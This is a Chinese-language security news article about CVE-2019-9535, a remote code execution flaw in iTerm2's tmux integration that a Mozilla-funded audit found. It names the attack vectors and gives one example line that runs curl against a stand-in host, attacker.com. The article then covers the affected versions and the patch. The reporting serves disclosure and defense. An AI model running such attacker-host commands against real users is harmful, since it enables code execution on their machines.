查看原文
其他

Mac 终端利器 iTerm2 被曝严重的 RCE 漏洞,至少已存在7年(含 PoC 视频)

综合编译 代码卫士 2022-04-06
 聚焦源代码安全,网罗国内外最新资讯!
编译:奇安信代码卫士团队

由 Mozilla 开源支持计划 (MOSS) 资助、网络安全公司 Radically Open Security (ROS) 开展的一次独立安全审计结果显示, iTerm 2 中存在一个严重的远程代码执行 (RCE) 漏洞,且至少已存在7年。


奇安信代码卫士团队现整理编译相关内容如下:

iTerm 2 简介

iTerm2 是全球最热门的终端模拟器之一,是开发人员经常使用的 MacOS 终端工具,是 Mac 内置终端 app 最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。
MOSS 计划选择 iTerm2 进行安全审计的原因在于它处理不受信任的数据且其使用范围广泛,用户包括高风险目标如开发人员和系统管理员。

漏洞概述

该漏洞的CVE 编号是CVE-2019-9535。
在审计过程中,ROS 在iTerm2 的 tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。攻击者如能生成终端输出,则在很多情况下能够在用户计算机上执行命令。这种攻击向量的例子是连接到由攻击者控制的 SSH 服务器或者命令如  curl http://attacker.com andtail -f /var/log/apache2/referer_lo
开发人员George Nachman 指出,“审计发现某个问题在收到一定的输入后会导致 iTerm2 发出命令。这个问题非常严重,因为在某些情况下,当用户查看文件或者接收在 iTerm2 构造的输入时,攻击者就能够在用户机器上执行代码。
Nachman 认为该漏洞影响的iTerm2 用户数量介于10万至20万之间。
Mozilla 公司的安全工程师 Tom Ritter 指出,这个漏洞源自 iTerm2 中的 tmux 集成功能。Tumx 应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。
CERT 协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过 ssh 连接至恶意服务器,通过curl 获取恶意网站,或者通过 tail –f 跟踪包含某些恶意内容的日志文件。”
如下是模拟受害者机器连接到恶意 SSH 服务器之后,在机器上执行命令的 PoC 视频。在这个案例中,只打开一个计算器作为其它更具恶意的命令的占位符。


一般情况下,该漏洞需要某些用户交互或伎俩才能遭触发,但由于它可通过通常被认为是安全的命令利用,因此它的潜在影响力巨大。

影响版本

该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

目前补丁已发布但自动更新尚未推送,建议用户立即在 iTerm2 目录中选择“检查新版本”手动更新至最新版本 3.3.6或 3.3.7beta1。

 

 


推荐阅读

macOS 再出 0day,通过合成点击即可绕过其安全功能


原文链接

https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/

https://www.theregister.co.uk/2019/10/10/iterm2_flaw_moss/




题图:Pixabay License



本文由奇安信代码卫士编译,不代表奇安信观点,转载请注明“转自奇安信代码卫士 www.codesafe.cn”



奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存